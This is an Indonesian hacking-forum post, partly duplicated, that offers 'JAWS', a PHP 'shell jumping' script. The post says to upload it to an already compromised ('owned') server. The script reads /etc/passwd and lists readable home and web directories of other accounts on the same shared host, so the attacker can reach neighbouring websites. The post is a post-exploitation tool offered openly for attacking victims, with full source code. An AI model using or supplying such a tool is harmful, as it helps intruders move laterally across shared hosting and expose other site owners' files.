05-29-2013, 11:55 AM
haha. iseng juga nih buat aplikasi kecil kecilan. semoga berguna .
ane penasaran ama yang namanya shell jumping. ternyata itu sebuah teknik untuk menggerayah website orang lain melalui server yang sudah kita tembus. shell jumping akan menampilkan direktori hosting dari user lain yang "se-host" dengan korban kita. nah ane buat aplikasi kecil ini, bingung namainnya. karena obsesi ma hiu. jadi ane namain "JAWS - Jump to Another WebSite" =))=))
screenshot :
Cara pakai :
Cukup mudah, tinggal upload ke target yang telah "owned". dan buka JAWS-nya lewat browser. maka akan otomatis melakukan scanning home direktori user yang se-host dengan korban.
FYI : beberapa teknik jumping mungkin tidak bisa bekerja karena server yang digunakan adalah hosting karena server yang digunakan khusus untuk hosting sehingga tidak terdapat file "/etc/passwd". teknik jumping biasanya dilakukan diserver linux murni sehingga file "/etc/passwd" dapat terbaca.
Source code :
atau Download:
JAWS
ane penasaran ama yang namanya shell jumping. ternyata itu sebuah teknik untuk menggerayah website orang lain melalui server yang sudah kita tembus. shell jumping akan menampilkan direktori hosting dari user lain yang "se-host" dengan korban kita. nah ane buat aplikasi kecil ini, bingung namainnya. karena obsesi ma hiu. jadi ane namain "JAWS - Jump to Another WebSite" =))=))
screenshot :
Cara pakai :
Cukup mudah, tinggal upload ke target yang telah "owned". dan buka JAWS-nya lewat browser. maka akan otomatis melakukan scanning home direktori user yang se-host dengan korban.
FYI : beberapa teknik jumping mungkin tidak bisa bekerja karena server yang digunakan adalah hosting karena server yang digunakan khusus untuk hosting sehingga tidak terdapat file "/etc/passwd". teknik jumping biasanya dilakukan diserver linux murni sehingga file "/etc/passwd" dapat terbaca.
Source code :
PHP Code:
<title>JAWS - Jump to Another WebSite</title>
<h1 style="color:#f00">JAWS - Jump to Another WebSite</h1>
<body style="font-family:verdana;color:#fff;background:#000;font-size:11px">
<?php
//shell jumper
$in = fopen("/etc/passwd","r");
if(!$in){
echo "Server does not support jumping";
}
else {
while(!feof($in)){
$data[] = fgets($in);
}
array_pop($data);
for($i = 0;$i < sizeof($data);$i++){
$buffer = explode(":",$data[$i]);
$str1 = "/home/".$buffer[0]."/public_html";
echo (is_readable($str1) ? "[FOUND] ".$str1."<br>\n":"");
$str2 = "/home/".$buffer[0]."/www";
echo (is_readable($str2) ? "[FOUND] ".$str2."<br>\n":"");
$str3 = "/home/".$buffer[0];
echo (is_readable($str3) ? "[FOUND] ".$str3."<br>\n":"");
$str4 = "/home/".$buffer[0]."/ftp";
echo (is_readable($str4) ? "[FOUND] ".$str4."<br>\n":"");
}
}
atau Download:
JAWS